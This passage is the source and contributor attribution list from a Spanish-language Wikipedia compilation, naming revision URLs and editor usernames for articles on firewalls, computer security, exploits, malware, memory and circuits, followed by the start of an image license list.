Fuente: http://es.wikipedia.org/w/index.php?oldid=67351521 Contribuyentes: Agus3985, Airunp, Alhassam, Biasoli, Gacpro, Gigaster, Grijander0, Ileana n, Jmvkrecords, Leszek Jaczuk, Pablomdo, Rikaaii, Titigns, 16 ediciones annimas Lista de control de acceso Fuente: http://es.wikipedia.org/w/index.php?oldid=64791179 Contribuyentes: Agox, Alhen unsafe, Angel GN, Camontuyu, Galaxy4, Hilmarz, Ignacioerrico, Jcaraballo, Jenix, Jkbw, JorgeGG, Manufernandez1985, Sebrev, Shooke, 37 ediciones annimas Firestarter Fuente: http://es.wikipedia.org/w/index.php?oldid=64902504 Contribuyentes: ColdWind, Conspiranoico, Cristianrock2, GermanX, I gor ka, Itnas19, Matdrodes, Shooke, Strange55, 6 ediciones annimas Unified Threat Management Fuente: http://es.wikipedia.org/w/index.php?oldid=64678208 Contribuyentes: Agox, Arcibel, Benceno, Chvelez, Diego screech, Jmanel, Matdrodes, Raulshc, Savh, Sixstone, Urumi, Wikopedo, 2 ediciones annimas RFC 2979 Fuente: http://es.wikipedia.org/w/index.php?oldid=37396624 Contribuyentes: .Sergio, Barcex, Carlos Humberto, Correogsk, Flazcano, Hawking, Lobillo, PabloCastellano, Tomatejc, Yrithinnd ZoneAlarm Fuente: http://es.wikipedia.org/w/index.php?oldid=64830107 Contribuyentes: Arapajoe, Biasoli, Cristianrock2, LordT, Matdrodes, Patrias, SF007, SuperBraulio13, UA31, 24 ediciones annimas Uncomplicated Firewall Fuente: http://es.wikipedia.org/w/index.php?oldid=64676726 Contribuyentes: Alcoben25, Dangelin5, GermanX, Vespinoloco, 1 ediciones annimas Gufw Fuente: http://es.wikipedia.org/w/index.php?oldid=65056765 Contribuyentes: Alcoben25, Asturix, Costales ast, Gaiterin, GermanX, Marquinos76, 6 ediciones annimas Ipfw Fuente: http://es.wikipedia.org/w/index.php?oldid=64505097 Contribuyentes: D9, Wikisilki PF (software) Fuente: http://es.wikipedia.org/w/index.php?oldid=64833006 Contribuyentes: Alfredobi, Cristianrock2, DaDez, Leo priego, Szoltys1990, Yonderboy, 13 ediciones annimas Cracking (software) Fuente: http://es.wikipedia.org/w/index.php?oldid=65101961 Contribuyentes: ARNT, Alakasam, Biasoli, ColdWind, Damianiencowiki, Kizar, Poco a poco, Sermed, Xvazquez Crack informtico Fuente: http://es.wikipedia.org/w/index.php?oldid=67343129 Contribuyentes: -Erick-, Acerswap, AchedDamiman, Aleposta, Andreasmperu, Angelito7, Asd3000, Aipni-Lovrij, Beaire1, Biasoli, Canopus49, Canopus49Puppet, Cobalttempest, ColdWind, Comae, David0811, Diegusjaimes, ESTUDIANTE, Elabra sanchez, Elnegrojose, Fidelmoquegua, Hispa, Irbian, Jkbw, Jp25, Juanalmenara, LadyInGrey, Lauseker diego, Loro 2, Magister Mathematicae, Markoszarrate, Matdrodes, Menthalo, Mirkovich, Mortadelo2005, Nellofetek, Nioger, Obelix83, Petruss, Plux, Racso, Sabbut, Sanbec, Seanver, TeleMania, Tirithel, Varano, Vitamine, Yakoo, 98 ediciones annimas Cracker Fuente: http://es.wikipedia.org/w/index.php?oldid=67405567 Contribuyentes: Abdulicas, Abgenis, Aeris17, AlfonsoERomero, Alhen, Antur, Argenz, Axvolution, Beaire1, Beto29, BetoCG, Biasoli, BlackBeast, Blender, Brakdag, CF, Cal Jac02, Cally Berry, Camilo, Cangueblues, Carmin, Cinabrium, ColdWind, Compumaniaco, Cookie, D1d4c, Damer graves, Damifb, Dangarcia, David0811, Davidge, Deviance, Dianai, Diegusjaimes, Dodo, Dr Juzam, Dusan, Edub, ElenaJesusULE, Eli22, Elrandy28, Elwesley, Emijrp, Franciscomesa, FrancoGG, Globalphilosophy, Gloria Rozo Linares, Gonmator, Guanaco, Gusama Romero, Hephaestos, Hispa, Huhsunqu, Humbefa, Humberto, Ignacio Icke, Ileana n, Internetsinacoso, Irsek, JLPS, JMPerez, Jah, Javier De La Cueva, Jfsanchez, Jfwiki, Jkbw, Jomra, JorgeGG, Jorgebarrios, Jugones55, Kizar, KnightRider, Kriko318, Kved, LGI2, LadyInGrey, LarA, Laura Fiorucci, Leonpolanco, LordT, Losetodo666, MaeseLeon, Malejhacmcho, Manw, MarcoAurelio, Matdrodes, Mel 23, Moriel, Muro de Aguas, Mxtintin, Mximo de Montemar, Mnica Cervantes, Nacionhacker, Nava0133, Netito777, Ni.cero, Nicoguaro, Nost, Nuen, N9, Opinador, Oscar ., Payasoandanteracista, Petronas, Platonides, Plux, Quijav, Qwertyytrewqqwerty, RHB15, Racso, Ralgis, Rastrojo, Renly, Resped, RoyFocker, Rrupo, Rutrus, Sincos, Snakefang, Solution, SuperBraulio13, Superzerocool, Surfaz, Taichi, Tatvs, Tigerfenix, Tirithel, Tomatejc, Tornbag, Travelour, VanKleinen, Varano, Vic Fede, Wikxd, Yrithinnd, Zaca83, conversion script, eui4ca.euskaltel.es, l, 406 ediciones annimas Password cracking Fuente: http://es.wikipedia.org/w/index.php?oldid=65268374 Contribuyentes: Alakasam, ColdWind, Damianiencowiki, Damifb, Death Master, Diegusjaimes, Ensada, Farisori, ILoveSugar, Jcrueda, LordT, Maudis, Vanbasten 23, Wilfreddehelm, 2 ediciones annimas Razor 1911 Fuente: http://es.wikipedia.org/w/index.php?oldid=64602732 Contribuyentes: ARNT, Angel GN, Biasoli, Hidoy kukyo, Kintaro, Kizar, Montgomery, Muro de Aguas, Nicoelmuta, Olivares86, Razer9911, Tasman, 72 ediciones annimas Desbordamiento de bfer Fuente: http://es.wikipedia.org/w/index.php?oldid=65248524 Contribuyentes: AchedDamiman, Airunp, AstroNomo, BetoCG, Bryant1410, C'est moi, CharlieM, Dodo, Electrodan, Folkvanger, GermanX, Gmarinp, Ignacioerrico, Jfwiki, Macar, Marfedd, Miguel Prez Francisco, Moleculax, Monty oso, Moriel, Opinador, Paintman, Profundo8, RGLago, Roberpl, Sageo, Shooke, Stitch, The worst user, Vanbasten 23, Waeswaes, Xandi, Zimio, 34 ediciones annimas Escner de puertos Fuente: http://es.wikipedia.org/w/index.php?oldid=64911543 Contribuyentes: Alexav8, Barri, Ciencia Al Poder, Geroldo, Marcejose, Mirok steel, Rcidte, 19 ediciones annimas Exploit Fuente: http://es.wikipedia.org/w/index.php?oldid=66253589 Contribuyentes: Aalvarez12, Airunp, Alguien, Angus, Artistadelpecado, Byj2000, CF, Chet, Cucuruchooo, DLeandroc, Edub, Elabra sanchez, Fercufer, Fmdlc, Gabriel-3432, GermanX, Helmy oved, Jfwiki, Joseaperez, Leonardo, Lzaro, Macar, MadriCR, Mansoncc, Metrnomo, Montgomery, Moriel, Mpeinadopa, Mstreet linux, Nessa los, Nhpatt, Qwertyytrewqqwerty, Ralgis, Renik, Rsg, SPZ, SuperBraulio13, Vitamine, WalterNewsome, Wikipablo, conversion script, 91 ediciones annimas Seguridad informtica Fuente: http://es.wikipedia.org/w/index.php?oldid=67366141 Contribuyentes: -jem-, 333, AchedDamiman, Acorletti, Acratta, Adrruiz, Agox, Aikurn, Airunp, Alakasam, Alex299006, Alexav8, Alhen, Amads, Andreasmperu, Angel GN, Antonorsi, Aosoriod, Arcibel, Asqueladd, Aziku, B3rN9, BL, Baiji, Banfield, Beesocialmx, Bernard, Bk26, BlackBeast, BrWriter2, Bucephala, CEVICAS, Cad, Cansado, Centroamericano, Ciencia Al Poder, Cinabrium, Cratn, Crisborghe, Curredsoc, Cxocommunity, Cybermeis, DJ Nietzsche, Damianiencowiki, Daniel121, Death Master, Deleatur, Demex, Diegusjaimes, Dodo, Draugmor, Eduardosalg, Edub, Edupedro, Egaida, Elabra sanchez, Emari, Emijrp, Er Komandante, Fixertool, Fran89, FrancoGG, Gabriel Acquistapace, Galandil, GermanX, Gerval, Giannii, Gins90, Greek, Gustavodiazjaimes, H3dicho, H4l9k, HECTOR ARTURO AZUZ SANCHEZ, HUB, Halfdrag, Helmy oved, House, Hprmedina, Humberto, Hctor Guido Calvo, ILoveSugar, Iescriva, InfoAudit, Ing.armandolopez, Intecocert, Internetsinacoso, Inu, Irbian, Isha, Iulius1973, Ivanics, JEDIKNIGHT1970, JUANCARLOSMTZT, Javiergtz, Javierito92, Jihernandez, Jkbw, Jmquintas1973, Jmvkrecords, JoanCaldern, JorgeGG, Jramio, Jugones55, Jurgens, K-F.U.N 2, Kizar, Kordas, KrumVik, Laozmdq, Lejocum, Leugim1972, LlamaAl, Loco085, Lucien leGrey, Luis 414, Luis1970, M3thod.mdf, MIGUEL OJEDA, MadriCR, Magister Mathematicae, Magrox, Maleiva, Mansoncc, Manw, MarcosJHofer, Matdrodes, McMalamute, Mecamtico, Mel 23, Mjsoto, Montejo, Montgomery, Mortadelo2005, Mpeinadopa, Muro de Aguas, Mushii, NaSz, NathyMig, Nayeli.Inteli, Neburor, Netito777, Nicop, Nihilo, Nubecosmica, OMenda, OboeCrack, Omarngo, Osado, Oscar ., Oscarif, P kos, Palissy, Pan con queso, Pchamorro, Petruss, Pitlik, Platonides, Poco a poco, Plux, Queninosta, Rafa2386, Ralgis, RamonVeres, Renly, Rennatot, Retama, Ricardo abarca, Ricardogpn, Rimac, Roberpl, Rodri cyberdog, Rodriguemus, Rogeliowar, Romel.rivas, Romz, RoyFocker, Rubpe19, Sanbec, Santi1212, Santiperez, Sarampin, Sausaf, Savh, Seanver, Seguridad informtica, SergioN, Snakeyes, Soniautn, SuperBraulio13, Superzerocool, Tano4595, Technopat, Thr41N, Tigerfenix, Tirithel, Tomatejc, Tostadora, UA31, Uncorreotemporal, Urruedelp, Vanessaalexandra, Vitamine, Vituzzu, Waka Waka, WebResearcher!, Wilfredor, YaiElSa, Yeza, 897 ediciones annimas

141

Fuentes y contribuyentes del artculo


Inseguridad informtica Fuente: http://es.wikipedia.org/w/index.php?oldid=64494680 Contribuyentes: AchedDamiman, Dreitmen, Enrique Cordero, Enrique r25, Farisori, Hack txus, Jamoncitosrebosantes, KarlaGH, Machucho2007, Mastergunz, Miss Manzana, Ralgis, Shara Laila, Technopat, Vzquezdaniel, XalD, 21 ediciones annimas Desbordamiento de pila Fuente: http://es.wikipedia.org/w/index.php?oldid=65568833 Contribuyentes: AchedDamiman, Farisori, Joseaperez, Superzerocool, Waeswaes, 5 ediciones annimas Desbordamiento de montculo Fuente: http://es.wikipedia.org/w/index.php?oldid=66327640 Contribuyentes: AchedDamiman, Cookie, Farisori, Joseaperez, Superzerocool, Waeswaes, ngel Luis Alfaro, 1 ediciones annimas Shellcode Fuente: http://es.wikipedia.org/w/index.php?oldid=64415526 Contribuyentes: Fmariluis, Fmdlc, GermanX, Guillerg, Javier Carro, Jfwiki, LyingB, Macar, Moriel, Paintman, Waeswaes, 11 ediciones annimas Error de software Fuente: http://es.wikipedia.org/w/index.php?oldid=66159508 Contribuyentes: 4lex, AchedDamiman, Adept, Alfre204, Bark, CF, Carnendil, Comae, Cuate77, Diegusjaimes, Edub, ElVaka, Eldelgas, Feedehh, GermanX, Gmarinp, Hanjin, Helenio, Joaferna2008, Josemiguel93, Jugones55, Kuanto, LSonico2012, Lfgg2608, Linus, Markoszarrate, Matdrodes, Moriel, Neodraco, OMenda, Poco a poco, Quiron, Salvador85, Sauron, Sonett72, Stoni, Superzerocool, VR0, Vitamine, Waeswaes, Wilfreddehelm, Xqno, Yuri Grille Orce, Zyder, 66 ediciones annimas Hacker Fuente: http://es.wikipedia.org/w/index.php?oldid=66764217 Contribuyentes: Alakasam, Alberto Elvira, AnselmiJuan, ArwinJ, Biasoli, Bloomy, Cristianuz12, Cybermaniac, Damianiencowiki, DayL6, Diegusjaimes, EdgarFabiano, El Pantera, FL0per, Fercufer, Gacpro, Gustronico, Hack txus, Humberto, Igna, Internetsinacoso, Isha, Isi viki, IvanStepaniuk, Jakeukalane, Javierito92, JoaquinFerrero, L0biz0n, Lustar, Malacitano, Mansoncc, NeftaliYagua, Nernix1, Olea, Omerta-ve, PabloCastellano, Resped, RubiksMaster110, Rge, Sabbut, Surfaz, Tirithel, Tucto, Vitamine, Wilfredor, 105 ediciones annimas Melissa (informtica) Fuente: http://es.wikipedia.org/w/index.php?oldid=66516693 Contribuyentes: Alex Longclaw, EGFerreiro, Kizar, 4 ediciones annimas Analizador de paquetes Fuente: http://es.wikipedia.org/w/index.php?oldid=64519272 Contribuyentes: Biasoli, Ciscoman, ColdWind, Cronos x, DDOc, Dany ule, Ejmeza, FAR, Feministo, Fitoschido, GermanX, Guillermolla, Ignacio Icke, JMPerez, Jfwiki, Jose David, Kimero, Lorenar13, Matdrodes, NaBUru38, Pilaf, Pilimex66, Porao, Readymade, SiMan, Taichi, Trebol6, 104 ediciones annimas Phishing Fuente: http://es.wikipedia.org/w/index.php?oldid=67441402 Contribuyentes: 32X, A ver, Aanggiiee, Acratta, Airunp, Alakasam, Aleja1994.17, Alejobd, Alexav8, Alextrevelian 006, Alvaro qc, Anita londoo, AnselmiJuan, Antur, Anvarstudios, Aofvilla, Asqueladd, Atila rey, Baiji, Barcex, Belgrano, Bogart NSSME, Bonilla daniel, Bryan alexander giraldo, Chuck es dios, Ciudadano77, Cmontero, ColdWind, Corrector1, Creosota, Crisborghe, Damianiencowiki, Damifb, Danniiela lopeez, David0811, Diana marcela correa, Diegusjaimes, Diotime, Dives, Dodo, Dr. Fasilier, Edison bolaos, Eduardosalg, Edupedro, Elisardojm, Emijrp, Ernesto Graf, FViolat, Filipo, GermanX, Gins90, Gizmo II, Greek, Gusama Romero, Gusgus, Halfdrag, Helmy oved, Ialad, Ignacio Icke, Irm, Itz37, J. A. Glvez, Jacorream, Jennixyta96, Jfwiki, Jkbw, Jkdd.laura, Jondel, Julianortega, Jynus, KErosEnE, Kakico, Kariime kaztro, Lady marin, Lasneyx, Laura Fiorucci, Leonpolanco, Lucien leGrey, MKernel, Magister Mathematicae, Mansoncc, Matdrodes, Matw13, Mazu castaeda, Melissa Savedra, Mortadelo2005, Mouse, Moylop260, Mpeinadopa, Muffinman, Nachosan, Olidata14, Pabloh, Paintman, Pedro Felipe, Plux, Qwertyytrewqqwerty, RGLago, Richy, RubiksMaster110, Sabbut, Salesian Party, Saloca, Savh, Seanver, Sergio Andres Segovia, Shalbat, Sitatunga, Soro 04, SuperBraulio13, Superzerocool, Taichi, Technopat, Tirithel, UA31, Vandal Crusher, Wedrey, Wikilptico, Zuirdj, 342 ediciones annimas Pharming Fuente: http://es.wikipedia.org/w/index.php?oldid=67161584 Contribuyentes: Alexav8, Antonorsi, Antur, Ca3sar, ColdWind, Galaxiaad, GermanX, Gomex, Gramito, Ictlogist, J. A. Glvez, Jatemanga, Jfwiki, JplULE, Kresp0, Libero, MarcoAurelio, Mariateresausuari uv, Matdrodes, Paintman, Pparistoy, Siabef, Tubet, 60 ediciones annimas Cross-site scripting Fuente: http://es.wikipedia.org/w/index.php?oldid=64415763 Contribuyentes: ANELKAOS, Alexav8, ArbeloA, Billinghurst, Borja Snchez, Corso, Cucuruchooo, Dodo, Er Komandante, ErKURITA, FeRmO, Federicotg, Folkvanger, FrancoGG, Futbolero, Gothmog, Iskhendar, Jfwiki, Jsanchezes, Jugones55, Jurgens, LPR, LordT, Luis junco, Macar, Maldoror, Marco Regueira, Matdrodes, MiDecadencia, Msalaslo, Nberger, NeguGorriak, Richy, Sabbut, Sirdarckcat, Spirit-Black-Wikipedista, Un Mercenario, Unf, Vanbasten 23, Vasi, WillyXoft, Xoneca, Youzwaz, Zuquirio, uo Martnez, 154 ediciones annimas Spam Fuente: http://es.wikipedia.org/w/index.php?oldid=67202496 Contribuyentes: 2rombos, 333, AchedDamiman, Agmichaca, Agox, Agrs700, Airunp, Akhram, Alakasam, Albireo3000, Alex299006, Alexav8, Alhen, Alvaro qc, Amads, Andreasmperu, Angel GN, Antonio Peinado, Antur, Ascnder, Aipni-Lovrij, Baiji, Barcex, Barri, Biasoli, Bustar, Caligari, Camilo, Carutsu, Cayetano mart valls 3, Chlewey, Ciencia Al Poder, Comae, Cookie, Corydora, Cratn, DZPM, Dalton2, Damifb, Daniel CA, DanielithoMoya, Dark Bane, DarkQuinto, Darkblaz, David0811, Deleatur, Desatonao, Diegusjaimes, Dodo, Domitori, Douglassucre, Draxtreme, Eamezaga, Edslov, Eduardosalg, Edub, Edupedro, Eloysito, Elsonido, Emijrp, Ensada, Ente X, Epiovesan, Equi, Er Komandante, Eternoendless, Exploratorio, FAR, Farconeti, Farisori, FedericoMP, Flangana, Fonsi80, Franciscomesa, Frei sein, Gabriel Acquistapace, Gacq, Ganmedes, GermanX, Ggenellina, Gian Pierre Rodriguez, Gins90, Greek, Grillado, Gusgus, Gtz, HECTOR ARTURO AZUZ SANCHEZ, HUB, Hormigo, Humberto, IWRGokuUzumaki, Ialad, Icetta, Idleloop, Igna, Isha, Ivan.Romero, IvanIguaran, J. A. Glvez, J.delanoy, JMB(es), JRIsP, Jaimito91, Jamj, Jarisleif, Javierito92, Jesusgay, Jjmerelo, Jjvaca, Jkbw, JoaquinFerrero, JorgeGG, Jorgemysterio, Joseaperez, Jsbadillo, Jugones55, Julian leonardo paez, Julianortega, Jynus, Kelv, Keres, Kernel panic, Kizar, Kulos, Kuskus, Kved, LMLM, LadyInGrey, Laura Fiorucci, Leonpolanco, Libero, LordT, Lospibes123, Lourdes Cardenal, MMPRrangers, MOSSO, MRK2001, Madalberta, Magister Mathematicae, Mahadeva, Maleiva, Malekov, Malkavian, Mansoncc, Manuel Gonzlez Olaechea y Franco, Manuelt15, MarcoAurelio, Masti, Matdrodes, Maugemv, McMalamute, Mcat95, Mel 23, Melisavergamaso, Menudillossss, Mercenario97, Mick95, MiguelAngelCaballero, Minterior, Miss Manzana, Moriel, Mr. Moonlight, Muro de Aguas, Mykel Amelinckx, Mytwm, Nachosan, Nassiel, Nernix1, Netito777, Ninrouter, Noprescriptionneeded, Oblongo, Oddworld, Omarmota 88, Oscarpez, Pacovila, Paintman, Palica, Pauloat, Penarc, Pepelopex, Pepesoto, Plux, Qac 3, Raas, Rastrojo, Ravave, Rgcamus, Ricardogpn, Rosarinagazo, Rosarino, Roveto, RoyFocker, Rge, SUPUL SINAC, Sabbut, Sanbec, Santiperez, Savh, Seanver, Sergimv, Siabef, Snakeeater, Snakeyes, Stonificado, Superzerocool, Tamorlan, Tano4595, Tbhotch, Technopat, TeleMania, Tidsa, Tinchox, Tintinando, Tirithel, Tomatejc, Tostadora, Triku, Turkhero, Txuspe, Ufache, Varano, Veltys, Veon, Vic Fede, Vitamine, Vivaelcelta, Waka Waka, Wesisnay, Wfox, Wilmar500, XSquall, Xavigivax, Xavimetal, Xqno, Xsanity, Yanqui perdido, Yeza, Yodigo, Zeroth, 739 ediciones annimas Troyano (informtica) Fuente: http://es.wikipedia.org/w/index.php?oldid=67401407 Contribuyentes: 9javivi, Agox, Airunp, Alhen, Alvaro qc, AnselmiJuan, Aipni-Lovrij, Beto29, Biasoli, Bucephala, BuenaGente, CF, Camilo, Camima, Cardesan, Cesarlsanchez, Charly naa, Ciencia Al Poder, Cipin, ColdWind, CommonsDelinker, Copa99, Creosota, Daimond, DanielithoMoya, Death Master, Diegusjaimes, Dossier2, Dracoramone, Eduardosalg, Edub, Eli22, Elrudi, Emiduronte, Expectativa online, Farre12, Fran89, Franco-eisenhower, FrancoGG, Furrykef, Gafotas, GermanX, HECTOR ARTURO AZUZ SANCHEZ, HUB, Halfdrag, Helmy oved, Humberto, Ialad, Igna, Internetsinacoso, Invadinado, Iuliusfox, J. A. Glvez, Jcaraballo, Jjvaca, Jkbw, Jorge c2010, Josemiguel93, Jvlivs, Kananas.ULE, Kirtash, Kizar, L'Amricain, LMLM, Lasneyx, Laura Fiorucci, Leonpolanco, Mahadeva, Maleiva, Mansoncc, Manuribadeo, Marqmagneto, Matdrodes, Maugemv, Mel 23, Montgomery, Mriosriquelme, Nicop, Nioger, Oscar ., P.o.l.o., Paintman, Pambazo, Petruss, Platonides, Plumagay2, Ppja, Plux, Queninosta, Ralgis, Retama, Rociomh, Rge, Santiperez, Savh, Seba1548, Sebbysms, Snakeeater, SuperBraulio13, Surfaz, Tano4595, Teamdragons, Technopat, Tinchog87, Tonchizerodos, Tostadora, UA31, Veon, WikiPancho, WikiWiki1, ZrzlKing, ^ DeViL ^, 419 ediciones annimas War dialing Fuente: http://es.wikipedia.org/w/index.php?oldid=64745501 Contribuyentes: GermanX, Mdiagom, Superzerocool, Xosema, 1 ediciones annimas Memoria de acceso aleatorio Fuente: http://es.wikipedia.org/w/index.php?oldid=67304120 Contribuyentes: .Jos, 2009yac, 2rombos, Aadrover, Adriansm, Airunp, Alakasam, Alhen, Alitagm, Alonduro, Alvaro qc, Amadohc, Anetamp, Angel GN, Angus, Antur, Ascnder, Astonbreak, Aipni-Lovrij, Baiji, BeaKManiak, Bee Geesfan, Beto29, BetoCG, Biasoli, Bifus, BlackBeast, Bpk, Bryant1410, Camilo, Carlos Gregorio Gonzlez, Carlosblh, Centeno, Cheveri, Chrihern, Cinabrium, CommonsDelinker, Cookie, Cousteau, Cristian Chvez Ramos, Crokett, DJ Nietzsche, Daaxe, Dangarcia, David0811, Davius, Death Master, Delphidius, Dibujon, Diego Lpez, Diego bf109, Diegusjaimes, Diosa, Dnu72, Dodo, Dogor, Dondervogel 2, Dorieo, Dvdgmz, Dvelasquez, Dyon, ECAM, Edgemaster, Edisonbeta, Edslov, Eduardosalg, Edub, El duende alegre, Eli22, Elisardojm, Eloy, Eltumorestripado, Elwikipedista, Equi, Er Komandante, Esoya, Estoymuybueno, Ezarate73, FAR, Fcosegura, Felviper, Fergarci, Fieruky, Filipo, Filiprino, Folkvanger, Franeleven, Furti, Fvene002, FyLoX, Galio, GermanX, Goica, Goofys, Gothmog, Greek, Green182, Guillermoster, Gustavo.cuenca, Gngora, HUB, Haku, Halfdrag, Hari Seldon, Helmy oved, Hernanbarbosa, Hispa, Humberto, Icvav, Igna, Isha, Itnas19, JMPerez, JOKblogger, Jafeluv, Jafu53, Javierito92, Jcentel, Jdelrio, Jefferlds, Jkbw, Joanumbert, Joarobles, JojAGT, Jondel, Jorge 2701, JorgeGG, Joseaperez, Josell2, Jsanchezes, Jtico, Juandiegocano, Jugones55, Julio Cardmat, Kavira, Kekkyojin, Kexedo, Kismalac, Kordas, Kuronokoneko, Kved, Laura Fiorucci, Leonpolanco, Limo, Llfernandoll, Lobo, Locos epraix, Lourdes Cardenal, Lucasjk23, Lucien leGrey, Luigidakid, LuisArmandoRasteletti, MILTONPATO, Magister Mathematicae, Maldoror, Mansoncc, Manu Lop, Manuegonzalez, Manuel Trujillo Berges, Manw, Maokoto, Marcecoro, MarcoAurelio, Matdrodes, Matiasasb, Maugemv, MeNtOrX, Mel 23, Miguel.lima, Miktam, Miss Manzana, Moriel, Mortadelo, Mortadelo2005, Mr. Benq, Muro de Aguas, Murphy era un optimista, Museo8bits, Nelsolla, Netito777, Nicop, Niko guti2006, Nixn, Obelix83, OceanO, Ornitododo, Oscar ., Pabloab, Pablomdo, Pan con queso, Parras, PasajeRoverano, Patxi Aguado, Paz.ar, Pedro GarNic, Penesauro, Perquisitore, Phirosiberia, Pilaf, Platonides, Poco a poco, Ppja, Prietoquilmes, Plux, Qwertyytrewqqwerty, Rabid Fish, Raf616, Rastrojo, Redmind007, Renly, Retama, Ricardogpn, Richy, Rickynoram, Rigenea, Roberpl, RoyFocker, RubiksMaster110, Rubpe19, STARPLAYER, SaeedVilla, Savh, Sebado, Sebrev, Sejorera, Shalbat, Shooke, Sms, Snakeyes, Soowly, Soulreaper, Sse4t4e, Stinger1, SuperBraulio13, Superchoto, Superzerocool, TArea, Taichi, Tano4595, Tantan1985, Taragui, Taty2007, Technopat, The worst user, Thunderbird2, Tico, Tolitose, Tomatejc, TorQue Astur, Tortillovsky, Triku, Truor, Txo, UA31, Unificacion, Uny, Varano, Vic Fede, Vitamine, Votinus, Vctor Antonio Torres Torres, Wilfredor, Will vm, Xqno, Yeza, Yio, Yrithinnd, Yubel, ZrzlKing, 1600 ediciones annimas Jerarqua de memoria Fuente: http://es.wikipedia.org/w/index.php?oldid=67307453 Contribuyentes: !Silent, Ajqnjqli, Alexvisio, Biasoli, CommonsDelinker, Cr4DLe, Dianai, Diegusjaimes, GermanX, Isha, JMPerez, Josell2, Josue lmm, Juckar, Mandramas, MartinDM, Martincarr, Rubpe19, Solde9, Technopat, Tostadora, 20 ediciones annimas Controlador de memoria Fuente: http://es.wikipedia.org/w/index.php?oldid=65064591 Contribuyentes: DJ Nietzsche, Enrique Cordero, TorQue Astur, 1 ediciones annimas

142

Fuentes y contribuyentes del artculo


Circuito integrado Fuente: http://es.wikipedia.org/w/index.php?oldid=67108240 Contribuyentes: 3coma14, 4lex, Abajo estaba el pez, Airunp, Ale flashero, Alfonso Mrquez, Amads, Andreasmperu, Angel GN, Angietigger, Anoryat, Antonio Pramo, Antur, Antn Francho, Ascatzihualtl, Ascnder, AstroNomo, Aipni-Lovrij, Bambadee, Baute2010, Biasoli, Bifus, Bostok I, Bragina, Bucephala, Camilo, Centeno, Chrihern, Cinabrium, Claudio Elias, Ctrl Z, Dangelin5, DarkKapo, Diegusjaimes, Digigalos, Dodo, Dorieo, Dreitmen, Eamezaga, Edmenb, Eduardosalg, Edub, El mago de la Wiki, Emiduronte, Emijrp, Empikki, Enric Naval, Erfil, Escrotoletal, Esv23, Fel.mendo, Fernando Estel, Fitoschido, Foundling, FrancoGG, Gabriel Fernando Rosso R., Galandil, Galenox, Gbloem1, Gins90, Gorospe, Gothmog, Green182, Gsrdzl, Gusgus, HECTOR ARTURO AZUZ SANCHEZ, HUB, Halfdrag, Helmy oved, Humberto, Igna, Isha, JCeb, Javierito92, Jekter, Jkbw, Jorge c2010, Jorgelrm, Joryes, Joss87, Jozhuaa, Jsanchezes, Juancxo, Jugones55, Khiari, Klystrode, Komputisto, Kved, Laura Fiorucci, Leonpolanco, Libertad y Saber, LlamaAl, Lopezmts, Lotesse, Lucianinski, MRK2001, Mafores, Magister Mathematicae, Mahadeva, Maldoror, ManuelGR, Manw, Marcelo Huerta, Mariooooo, Marvelshine, Matdrodes, Melocoton, Mendezmh, Mirkovich, Mokillo, Mommynotamushed, Moriel, Mrsebastoon, Muro de Aguas, Murphy era un optimista, Murven, Neurotronix, Ortisa, PACO, Pertile, Phirosiberia, Poco a poco, PyroMaker, Plux, Queninosta, R0MAN0, Racso, Rafa3040, Raikkonen F1, Raystorm, Reypg87, Ricardogpn, Rigenea, SMP, Sanbec, Sauron, Savh, Sdepares, Seanver, Sergio Andres Segovia, SergioN, Shooke, Snakefang, Sofiapx, SuperBraulio13, Superzerocool, Switcher6746, Tano4595, Technopat, Tomatejc, UA31, Vatelys, Vic Fede, Waka Waka, Whatsupchap, Wilfredor, Will vm, Xavimetal, Xenoforme, Xoneca, Xuankar, Yeza, Yvon ramirez, rico Jnior Wouters, 534 ediciones annimas Circuito impreso Fuente: http://es.wikipedia.org/w/index.php?oldid=67426381 Contribuyentes: .Sergio, ALEXAVIL, Alberto009 a, Alberto2010, Aweinstein, Banamex 5, Biasoli, Bostok I, Brayan Sneider, Bucephala, CORNUCOPIA, Canica, Cfede1984, Cinevoro, Cobalttempest, Damifb, DoN vErDuGo, Ellinik, Ezarate, FAR, Gaeddal, Ganmedes, GiraldoX, HUB, Helmy oved, Isha, Javierito92, Jgroeneveld, Jkbw, KAYK, Kordas, Kved, Laura Fiorucci, Leonpolanco, Lucien leGrey, Maldoror, Manuelt15, Manw, Marvelshine, Matdrodes, Mcagliani, Mokillo, Moonkey, Mortadelo2005, Murphy era un optimista, NaSz, Nicop, Ortisa, Patricio Uribe M., Pccoronado, Petronas, Plux, RuslanBer, Savh, Seluis, Snakeyes, Spirit-Black-Wikipedista, Thingg, Torquemado, Tostadora, Uny, Vic Fede, Xavimetal, Xoneca, Yrithinnd, , 228 ediciones annimas

143

Fuentes de imagen, Licencias y contribuyentes

144

Fuentes de imagen, Licencias y contribuyentes


Archivo:Commons-logo.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Commons-logo.svg Licencia: logo Contribuyentes: SVG version was created by User:Grunt and cleaned up by 3247, based on the earlier PNG version, created by Reidab. Archivo:Cmo funciona el e-mail.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Cmo_funciona_el_e-mail.svg Licencia: GNU Free Documentation License Contribuyentes: Clemente, 1 ediciones annimas Archivo:Houses.of.parliament.overall.arp.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Houses.of.parliament.overall.arp.jpg Licencia: Public Domain Contribuyentes: Arpingstone, Bhoeble, Common Good, Mtaylor848, Nichtbesserwisser, 1 ediciones annimas Archivo:Arquitectura_linux.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Arquitectura_linux.png Licencia: Creative Commons Attribution-Share Alike Contribuyentes: GLUD Archivo:Linux_Distribution_Timeline.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Linux_Distribution_Timeline.svg Licencia: desconocido Contribuyentes: Andreas Lundqvist Image:Debian 6.0.2.1.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Debian_6.0.2.1.png Licencia: Creative Commons Attribution 3.0 Contribuyentes: Malgratdemar Image:Fedora_16_verne_Linux_Version.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Fedora_16_verne_Linux_Version.png Licencia: desconocido Contribuyentes: Proyecto Fedora (patrocinado por Red Hat) Image:Gentoo-10.0-livedvd.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Gentoo-10.0-livedvd.png Licencia: GNU General Public License Contribuyentes: Gentoo 10.0 LiveDVD Team Image:Mandriva2010gnomeone.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Mandriva2010gnomeone.png Licencia: Creative Commons 